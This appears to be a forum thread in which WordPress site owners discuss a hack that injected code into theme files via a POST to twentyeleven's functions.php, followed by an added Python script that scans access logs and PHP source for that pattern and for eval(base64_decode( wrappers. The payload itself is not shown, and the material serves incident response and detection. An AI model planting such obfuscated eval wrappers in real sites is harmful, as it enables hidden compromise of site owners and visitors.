Anyone found the source of this exploit yet? It hit two of the 25 or so sites on my server, so we fixed those up manually and updated their WordPress versions. Like several of you, I've got multiple cPanels on a VPS and only one got hit. Is this a local WordPress exploit, or something that I should be concerned with for my entire server?
Maybe of interest to you guys, but just out of curiosity I did a database dump of one of my WP sites and started looking through it. There is all sorts of crap in there from certain plugins/widgets that I installed. If I can remember the plugins I'll post them here. I am sure one of them was a tag cloud plugin. I have since deleted the plugins and cleaned up the database.
Can any of you help me decode the following and explain step by step how you decode it? Especially the last part with the JavaScript code: eval(base64_decode('...'));
Hi guys, one of my sites was also recently hacked with similar characteristics. Upon checking my logs it looks as if they got in via a POST request to functions.php in the twentyeleven theme. I only just discovered it, so not sure exactly how it was compromised as yet, but the first step seems to modify functions.php with a feedback check to see if they obtained access, then they modified the main index.php. The twentyeleven theme was not even active either, so I've removed the twentyten & twentyeleven themes as a precaution.
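
An added example, not posted by anyone in this thread: a small Python check for the two indicators mentioned above, POST requests sent directly to PHP files under a theme directory in the access log, and `eval(base64_decode(` wrappers in PHP source. It assumes Apache combined log format; the function names, sample log lines and sample PHP are constructed for illustration.

```python
import re

# Combined-log-format prefix: ip ident user [timestamp] "METHOD path PROTO" status
REQ = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Direct requests to a PHP file inside any theme directory
THEME_PHP = re.compile(r'/wp-content/themes/([^/]+)/[^?\s]*\.php(?:\?|$)', re.I)
# eval() wrapped around base64_decode(), tolerant of whitespace and case
EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(', re.I)

def suspicious_theme_posts(log_lines):
    """Return (ip, timestamp, path, status) for POSTs aimed at theme PHP files."""
    hits = []
    for line in log_lines:
        m = REQ.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, ts, method, path, status = m.groups()
        if method.upper() == "POST" and THEME_PHP.search(path):
            hits.append((ip, ts, path, int(status)))
    return hits

def injected_lines(php_source):
    """Return 1-based line numbers that contain an eval(base64_decode( wrapper."""
    return [n for n, text in enumerate(php_source.splitlines(), 1)
            if EVAL_B64.search(text)]

# Constructed sample data (documentation IP ranges, made-up timestamps)
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2012:10:00:01 +0000] "GET /wp-content/themes/twentyeleven/style.css HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2012:10:00:05 +0000] "POST /wp-content/themes/twentyeleven/functions.php HTTP/1.1" 200 12',
    '198.51.100.9 - - [01/Jan/2012:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 8301',
    '203.0.113.7 - - [01/Jan/2012:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]
# Constructed PHP; the base64 string is a harmless placeholder
SAMPLE_PHP = "<?php\n/* theme functions */\neval ( base64_decode('Li4u'));\nfunction setup() {}\n"

if __name__ == "__main__":
    for hit in suspicious_theme_posts(SAMPLE_LOG):
        print("POST to theme file:", hit)
    print("eval(base64_decode on lines:", injected_lines(SAMPLE_PHP))
```

A hit from either function is a lead to review by hand, not proof of compromise; the source IP and timestamp from a log hit can then be used to find the same client's other requests.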